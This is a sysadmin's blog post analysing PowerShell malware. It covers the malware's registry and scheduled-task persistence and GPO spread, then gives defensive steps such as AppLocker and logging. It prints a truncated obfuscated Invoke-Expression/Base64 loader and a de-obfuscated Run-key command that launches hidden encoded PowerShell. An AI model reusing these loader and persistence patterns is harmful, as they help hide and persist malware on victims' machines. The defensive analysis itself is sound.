Saturday, November 5, 2016

Powershell Malware

I've been wanting to post about this subject for a while now but haven't had the chance. Hopefully I can give everyone some info on this subject.

First, what is Powershell Malware? Simply put, its powershell commands that go out and download powershell scripts that install keyloggers, takes screenshots, copies clipboard data and downloads more code.

From what I can tell, this is the life cycle of powershell malware:

  1. A user clicks a link or otherwise gets a piece of malware on their computer starts the process
  2. It creates a value called ComputerID under HKCU\Software\Microsoft\Windows\CurrentVersion.
  3. It will then create a value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  4. Some of the malware will create scheduled tasks so that even if you delete those values the scheduled task will recreate them
  5. In domain environments it creates or adds to a GPO so that these values are sent to all the computers in the domain and also creating scheduled tasks.

Here is what it looks like (I removed the full Base64 string):

Invoke-Expression(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('rV............

To figure out what they're doing, substitute "Write-Host" for the "Invoke-Expression" at the beginning and run it, and you get the following (again, I took out the Base64 code and replaced it with dots):

Set-ItemProperty -Force -Path HKLM:Software\Microsoft\Windows\CurrentVersion -Name ComputerID -Value  "......................."; Set-ItemProperty -Force -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run -Name Powersh
ellActiveDirectoryValue"`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`" -c `"`$x=`$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc `$x`""

The above is the powershell malware creating the values with the commands in Base64.

At this point in time when it executes those commands it goes to a website to download the other scripts that will create key loggers, screen shots, copy clipboard data, etc. It would look something like this:


The port above is 9002 but it can be any port or just HTTPS.

The poweshell scripts it downloads seem to be from PowerSploit. I wont link here but you can Google it or find more info on Github. 

The worse part about this whole thing is that it will bypass all of your security measures. I mean, for the most part, who is blocking powershell commands? As Administrator we use them all the time on all of our systems. Since it's just downloading files most web filtering will let it through. 

So how do you stop it? A couple things but not much (as far as I know at this point and time)
  1. Use AppLocker to put Powershell in constrained language mode. 
  2. Enable Powershell logging and (if possible) centrally collect it
  3. Whitelist know scripts and dont let anything lese run powershell scripts. This can be done with AppLocker
  4. Block port that you don't need
If I find any more info I will post it.


I want to thank Tanner Kinkead, for helping me decipher the code and filling in the missing pieces for me as well as the suggestions above on how to help prevent it.

No comments:

Post a Comment

User unable to login to RDP Farm after you re-enable them?

We had a strange issue. We had a user leave and since we knew when she was leaving i set the account to expire at a certain date. A couple d...